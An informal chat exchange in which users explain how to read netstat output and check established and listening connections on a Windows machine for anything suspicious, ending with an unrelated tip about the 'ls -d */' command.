is it running a listener? Is it connecting out? Netstat and windows firewall are good tools to learn how to read.
Well, if somethign you actually uses breaks, you'll know why
Well, I ran netstat and I can see alot of connections how do I know what is malicious and what isn't?
Completely up to what you have setup on your machine
Look at the ESTABLISHED and LISTENING connections, if you don't recognize the port or IP, investigate what they're used for and where the ip goes
no listening ones, but a TON of established, Ill start checking thjem out
Lots of googling. Most of what you're seeing is normal for any OS, as you will likely have a ton of background services for things you use that constantly check for updates and send out user experience feedback data.
Ah alright
ls -d */ forgot this command, sharing is caring

